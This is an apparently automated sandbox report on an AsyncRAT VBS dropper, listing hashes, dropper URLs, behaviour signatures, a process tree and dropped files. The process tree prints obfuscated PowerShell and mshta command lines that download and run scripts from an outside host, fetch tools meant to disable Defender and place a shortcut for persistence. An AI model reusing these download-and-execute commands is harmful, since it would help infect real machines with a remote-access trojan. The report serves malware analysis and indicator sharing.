asyncrat | 767111470dee2831acd1ca1cbfd8e4acb400a71a12422a27922ddf300315f5c7

Analysis

max time kernel
149s
max time network
92s
platform
windows7_x64
resource
win7v20210410
submitted
06-05-2021 04:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NY54.vbs
Size

976B
MD5

8386ad530818e9eb7d3f382539903273
SHA1

5713f51096c411288c065155cbd9b4f197fe7908
SHA256

767111470dee2831acd1ca1cbfd8e4acb400a71a12422a27922ddf300315f5c7
SHA512

dc387f94f678b9c81e00f13421a82cf4c64af612984efb3fd81e08c2f91c7b4079c51d4b81088f2c233344dc8b8d6665b289ae2918a27a3c4f4a901157adec8c

Score

10^/10

asyncrat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://worf.hosterbox.com/~htgfgdrt/WSA/3.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/NDef/11.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/NDef/Defender.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/NDef/DefenderKill.lnk

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/NDef/Kill.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/ExDef/GoogleUpdate.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/WSA/1.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/ExDef/Dicord.lnk

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/2012-195-0x000000000040D09E-mapping.dmp	asyncrat

Blocklisted process makes network request 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
6	2040	powershell.exe
8	2040	powershell.exe
9	2040	powershell.exe
11	2040	powershell.exe
13	1224	powershell.exe
15	2032	powershell.exe
17	484	powershell.exe
20	952	powershell.exe
21	560	powershell.exe
23	1576	powershell.exe
25	2012	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1192 set thread context of 2012 1192 powershell.exe MSBuild.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

description	pid	process	target process
PID 1192 set thread context of 2012	1192	powershell.exe	MSBuild.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2040	powershell.exe
2040	powershell.exe
1556	powershell.exe
1556	powershell.exe
1224	powershell.exe
1224	powershell.exe
2032	powershell.exe
2032	powershell.exe
484	powershell.exe
484	powershell.exe
952	powershell.exe
952	powershell.exe
560	powershell.exe
560	powershell.exe
1908	powershell.exe
1908	powershell.exe
1576	powershell.exe
1576	powershell.exe
1000	powershell.exe
1000	powershell.exe
2012	powershell.exe
2012	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe
1192	powershell.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	1556	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	484	powershell.exe
Token: SeDebugPrivilege	952	powershell.exe
Token: SeDebugPrivilege	560	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	1000	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	752	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exeWScript.exepowershell.exepowershell.execmd.exemshta.execmd.exemshta.execmd.exepowershell.exe

description	pid	process	target process
PID 1100 wrote to memory of 2040	1100	WScript.exe	powershell.exe
PID 1100 wrote to memory of 2040	1100	WScript.exe	powershell.exe
PID 1100 wrote to memory of 2040	1100	WScript.exe	powershell.exe
PID 2040 wrote to memory of 1480	2040	powershell.exe	WScript.exe
PID 2040 wrote to memory of 1480	2040	powershell.exe	WScript.exe
PID 2040 wrote to memory of 1480	2040	powershell.exe	WScript.exe
PID 1480 wrote to memory of 1556	1480	WScript.exe	powershell.exe
PID 1480 wrote to memory of 1556	1480	WScript.exe	powershell.exe
PID 1480 wrote to memory of 1556	1480	WScript.exe	powershell.exe
PID 1556 wrote to memory of 1224	1556	powershell.exe	powershell.exe
PID 1556 wrote to memory of 1224	1556	powershell.exe	powershell.exe
PID 1556 wrote to memory of 1224	1556	powershell.exe	powershell.exe
PID 1556 wrote to memory of 2032	1556	powershell.exe	powershell.exe
PID 1556 wrote to memory of 2032	1556	powershell.exe	powershell.exe
PID 1556 wrote to memory of 2032	1556	powershell.exe	powershell.exe
PID 1556 wrote to memory of 484	1556	powershell.exe	powershell.exe
PID 1556 wrote to memory of 484	1556	powershell.exe	powershell.exe
PID 1556 wrote to memory of 484	1556	powershell.exe	powershell.exe
PID 1556 wrote to memory of 952	1556	powershell.exe	powershell.exe
PID 1556 wrote to memory of 952	1556	powershell.exe	powershell.exe
PID 1556 wrote to memory of 952	1556	powershell.exe	powershell.exe
PID 2040 wrote to memory of 560	2040	powershell.exe	powershell.exe
PID 2040 wrote to memory of 560	2040	powershell.exe	powershell.exe
PID 2040 wrote to memory of 560	2040	powershell.exe	powershell.exe
PID 1556 wrote to memory of 1908	1556	powershell.exe	powershell.exe
PID 1556 wrote to memory of 1908	1556	powershell.exe	powershell.exe
PID 1556 wrote to memory of 1908	1556	powershell.exe	powershell.exe
PID 2040 wrote to memory of 1576	2040	powershell.exe	powershell.exe
PID 2040 wrote to memory of 1576	2040	powershell.exe	powershell.exe
PID 2040 wrote to memory of 1576	2040	powershell.exe	powershell.exe
PID 1908 wrote to memory of 1336	1908	powershell.exe	cmd.exe
PID 1908 wrote to memory of 1336	1908	powershell.exe	cmd.exe
PID 1908 wrote to memory of 1336	1908	powershell.exe	cmd.exe
PID 1336 wrote to memory of 1984	1336	cmd.exe	mshta.exe
PID 1336 wrote to memory of 1984	1336	cmd.exe	mshta.exe
PID 1336 wrote to memory of 1984	1336	cmd.exe	mshta.exe
PID 1984 wrote to memory of 1000	1984	mshta.exe	powershell.exe
PID 1984 wrote to memory of 1000	1984	mshta.exe	powershell.exe
PID 1984 wrote to memory of 1000	1984	mshta.exe	powershell.exe
PID 2040 wrote to memory of 2012	2040	powershell.exe	powershell.exe
PID 2040 wrote to memory of 2012	2040	powershell.exe	powershell.exe
PID 2040 wrote to memory of 2012	2040	powershell.exe	powershell.exe
PID 2040 wrote to memory of 968	2040	powershell.exe	cmd.exe
PID 2040 wrote to memory of 968	2040	powershell.exe	cmd.exe
PID 2040 wrote to memory of 968	2040	powershell.exe	cmd.exe
PID 2040 wrote to memory of 968	2040	powershell.exe	cmd.exe
PID 2040 wrote to memory of 968	2040	powershell.exe	cmd.exe
PID 968 wrote to memory of 2032	968	cmd.exe	mshta.exe
PID 968 wrote to memory of 2032	968	cmd.exe	mshta.exe
PID 968 wrote to memory of 2032	968	cmd.exe	mshta.exe
PID 2032 wrote to memory of 1192	2032	mshta.exe	powershell.exe
PID 2032 wrote to memory of 1192	2032	mshta.exe	powershell.exe
PID 2032 wrote to memory of 1192	2032	mshta.exe	powershell.exe
PID 2040 wrote to memory of 1728	2040	powershell.exe	cmd.exe
PID 2040 wrote to memory of 1728	2040	powershell.exe	cmd.exe
PID 2040 wrote to memory of 1728	2040	powershell.exe	cmd.exe
PID 2040 wrote to memory of 1728	2040	powershell.exe	cmd.exe
PID 2040 wrote to memory of 1728	2040	powershell.exe	cmd.exe
PID 1728 wrote to memory of 1392	1728	cmd.exe	mshta.exe
PID 1728 wrote to memory of 1392	1728	cmd.exe	mshta.exe
PID 1728 wrote to memory of 1392	1728	cmd.exe	mshta.exe
PID 1192 wrote to memory of 1140	1192	powershell.exe	MSBuild.exe
PID 1192 wrote to memory of 1140	1192	powershell.exe	MSBuild.exe
PID 1192 wrote to memory of 1140	1192	powershell.exe	MSBuild.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NY54.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`E`X((n`e`W`-Obj`E`c`T(('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).INVOKE((('https://worf.hosterbox.com/~htgfgdrt/WSA/3.txt'))))
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\ss.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/NDef/11.ps1', 'C:\Users\Public\11.ps1') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/NDef/Defender.bat', 'C:\Users\Public\Defender.bat') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/NDef/DefenderKill.lnk', 'C:\Users\Public\DefenderKill.lnk') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/NDef/Kill.ps1', 'C:\Users\Public\Kill.ps1') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\Kill.ps1
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1908

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\Defender.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:1336

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\11.ps1'"", 0:close")
7⤵
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\11.ps1'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/WSA/1.txt', 'C:\Users\Public\msi.ps1') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\GoogleUpdate.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:968

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(StrReverse(""llehS.tpircSW"")).Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'"", 0:close")
4⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:1140

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:1472

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:576

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:1164

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:336

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:1060

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:1844

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:2004

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:1952

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:864

C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
6⤵
PID:1012

C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
6⤵
PID:2012

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 372
7⤵
PID:1840

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\GoogleUpdate.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(StrReverse(""llehS.tpircSW"")).Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'"", 0:close")
4⤵
PID:1392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:2028

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:1100

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:1964

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:1456

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:880

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft Arts\Start\Dicord.lnk
MD5
ce592d7b323596c62e25c58305fbd1f1

SHA1
a582b2c867d054bfc436ac04aa8b626a6e7c886b

SHA256
8cf9b48967283e8d15012c6f9438280841bb94baf499a91647922f28eab37619

SHA512
0b5640a2261fbb5bcdb60dee6b6178b2c451cce411d8b8791c8d6dc09e1b01a0e80d605a6e4e119453f349e4ee62340e9a3bed70dadb16a8b2fd4592facd3335

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
e9e6647731a1ded04ccee66041b00ac4

SHA1
7f4abe41b2449867a18d742849ead992c04797ff

SHA256
14dd20daa7cebb95cc9deefd0ae19c981a3e78e0ce1740062e75752c52d0688e

SHA512
637399893b46b81d3c8860a3c2a3f20a50f856d3accf24e85affc95b3aeba5a9ff4b1459e4238aeb4e857959125bf53adee05e60b64de547a392668bd66409ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
f3219c83c7f7a147d8df6dec6479810c

SHA1
c9f2bc575ff7f7dd534ae35cffd8d3531d27f5b3

SHA256
06844bb9a386b05ebbd384e21463868ffad44e9d3901ab5c919f245a944ba888

SHA512
283245edee0738d5686975b08ec23ccb9c0021a9dc26c7fad336f6bb181ad3214b26c0be5b6df21df3fc50709366a51cfaf76d1c4eec75e2dddc054597e26a28

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
dd7fd75069a70e91a80889d1b05e6b2f

SHA1
5662138242a4bf81af85d3eae712358943667840

SHA256
2c7621f6b93f317d8930b1eb8060acd64c3b7b5f0761d1687194f4baa58f823b

SHA512
471ac7812b27c5e8834c71deef2637625ddea05cefbb37bd2da396839f800f0b939a08e61790f370d8377d13ddaea6f5289ab6ad50383adff95009555444824d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
dd7fd75069a70e91a80889d1b05e6b2f

SHA1
5662138242a4bf81af85d3eae712358943667840

SHA256
2c7621f6b93f317d8930b1eb8060acd64c3b7b5f0761d1687194f4baa58f823b

SHA512
471ac7812b27c5e8834c71deef2637625ddea05cefbb37bd2da396839f800f0b939a08e61790f370d8377d13ddaea6f5289ab6ad50383adff95009555444824d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
dfbd1e953b24d6a366adb9b49794633f

SHA1
40c4691c7738f2efde7dc872219237745e5b2a1e

SHA256
06d422b0be27021fad323e92af1603ae861b2a8b725658ba77ed5d8cccc2274b

SHA512
7b09c60e6c8f5d50d442edbbe5ac82fdf87442985e1724e91861ee655fef532e99fce527d4b13e84c45befc22d92abf3f5af97ad926ef148a222c6b42824ec43

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
dd7fd75069a70e91a80889d1b05e6b2f

SHA1
5662138242a4bf81af85d3eae712358943667840

SHA256
2c7621f6b93f317d8930b1eb8060acd64c3b7b5f0761d1687194f4baa58f823b

SHA512
471ac7812b27c5e8834c71deef2637625ddea05cefbb37bd2da396839f800f0b939a08e61790f370d8377d13ddaea6f5289ab6ad50383adff95009555444824d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
dd7fd75069a70e91a80889d1b05e6b2f

SHA1
5662138242a4bf81af85d3eae712358943667840

SHA256
2c7621f6b93f317d8930b1eb8060acd64c3b7b5f0761d1687194f4baa58f823b

SHA512
471ac7812b27c5e8834c71deef2637625ddea05cefbb37bd2da396839f800f0b939a08e61790f370d8377d13ddaea6f5289ab6ad50383adff95009555444824d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
dd7fd75069a70e91a80889d1b05e6b2f

SHA1
5662138242a4bf81af85d3eae712358943667840

SHA256
2c7621f6b93f317d8930b1eb8060acd64c3b7b5f0761d1687194f4baa58f823b

SHA512
471ac7812b27c5e8834c71deef2637625ddea05cefbb37bd2da396839f800f0b939a08e61790f370d8377d13ddaea6f5289ab6ad50383adff95009555444824d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
dd7fd75069a70e91a80889d1b05e6b2f

SHA1
5662138242a4bf81af85d3eae712358943667840

SHA256
2c7621f6b93f317d8930b1eb8060acd64c3b7b5f0761d1687194f4baa58f823b

SHA512
471ac7812b27c5e8834c71deef2637625ddea05cefbb37bd2da396839f800f0b939a08e61790f370d8377d13ddaea6f5289ab6ad50383adff95009555444824d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
dd7fd75069a70e91a80889d1b05e6b2f

SHA1
5662138242a4bf81af85d3eae712358943667840

SHA256
2c7621f6b93f317d8930b1eb8060acd64c3b7b5f0761d1687194f4baa58f823b

SHA512
471ac7812b27c5e8834c71deef2637625ddea05cefbb37bd2da396839f800f0b939a08e61790f370d8377d13ddaea6f5289ab6ad50383adff95009555444824d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
dd7fd75069a70e91a80889d1b05e6b2f

SHA1
5662138242a4bf81af85d3eae712358943667840

SHA256
2c7621f6b93f317d8930b1eb8060acd64c3b7b5f0761d1687194f4baa58f823b

SHA512
471ac7812b27c5e8834c71deef2637625ddea05cefbb37bd2da396839f800f0b939a08e61790f370d8377d13ddaea6f5289ab6ad50383adff95009555444824d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
dd7fd75069a70e91a80889d1b05e6b2f

SHA1
5662138242a4bf81af85d3eae712358943667840

SHA256
2c7621f6b93f317d8930b1eb8060acd64c3b7b5f0761d1687194f4baa58f823b

SHA512
471ac7812b27c5e8834c71deef2637625ddea05cefbb37bd2da396839f800f0b939a08e61790f370d8377d13ddaea6f5289ab6ad50383adff95009555444824d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
dd7fd75069a70e91a80889d1b05e6b2f

SHA1
5662138242a4bf81af85d3eae712358943667840

SHA256
2c7621f6b93f317d8930b1eb8060acd64c3b7b5f0761d1687194f4baa58f823b

SHA512
471ac7812b27c5e8834c71deef2637625ddea05cefbb37bd2da396839f800f0b939a08e61790f370d8377d13ddaea6f5289ab6ad50383adff95009555444824d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
dd7fd75069a70e91a80889d1b05e6b2f

SHA1
5662138242a4bf81af85d3eae712358943667840

SHA256
2c7621f6b93f317d8930b1eb8060acd64c3b7b5f0761d1687194f4baa58f823b

SHA512
471ac7812b27c5e8834c71deef2637625ddea05cefbb37bd2da396839f800f0b939a08e61790f370d8377d13ddaea6f5289ab6ad50383adff95009555444824d

Download Submit
C:\Users\Public\11.ps1
MD5
f9671f50a3701099915249be9c9b519e

SHA1
c383a79653700507edf01c494f2a7ac664963711

SHA256
987b88896b23da2d57371bf1709019bee218ee72fb9a88f9afda88427570c448

SHA512
d21f67cee9d3fe56541beaab90c28335f9122abb1942a209ba6634f5f14fa75f8d43a3e0c4a11d2009a964200d06836df8245264c0922b8c46adff68d2293a41

Download Submit
C:\Users\Public\11.ps1
MD5
c2ff4484e0398aba605cd1e1b89de56a

SHA1
db4eae0aa556412afe55cc62aca6a15fc0c85e07

SHA256
d216cbc98c747a0f8d66197d3094c544bbb8e33fe5f4c0962dd7baf2af7c1604

SHA512
08ab0be1107ba3ae3c88d57cb1dce8956874d84301ddfb05576677aba1d7ff3c696503a63239f68e36ee2a651b4e0a50dbdf147fc433e894dde861ba5263475a

Download Submit
C:\Users\Public\Defender.bat
MD5
bb81dd50c01d78e9359b7d8f2b99f93e

SHA1
35ecd940870508d659866d43351ebd11920b98b8

SHA256
fa94673156394c814fdab9b634ad6e327cc7e0f6cf5412f31d74103a3a6e3931

SHA512
3c29815e29a65e14f0202ddd9c83eda367535651f87332be39acfe2d0c51536cc224281b7c794f1b67a3528c293fdf76a7142b5d1c1c734ab35c664fa657f90f

Download Submit
C:\Users\Public\DefenderKill.lnk
MD5
d50605593740da71810d0dedf04281e0

SHA1
b672961b731400d653039fedcd7dfa71cc3e0179

SHA256
56ec901d7efadda7a2868abc7ff458d8177660361e5572a4806a232e46846464

SHA512
190a98490786fbdf8b189ea10697b7a6acebdaf0dcda11d7d6fde8c1df72af2fd4c5d0b2874d812e20307d609d25af354ff74ce2fd564a563b84912975f46b05

Download Submit
C:\Users\Public\GoogleUpdate.bat
MD5
311524c0e72f5c65f62bf73ffb57ee3c

SHA1
c917cb67fac476be24cd73eddafd21c7da79af15

SHA256
62da5d7a78b42aeed845e30f7360e42adb2cf77365386295ebc549d9ce0d4daa

SHA512
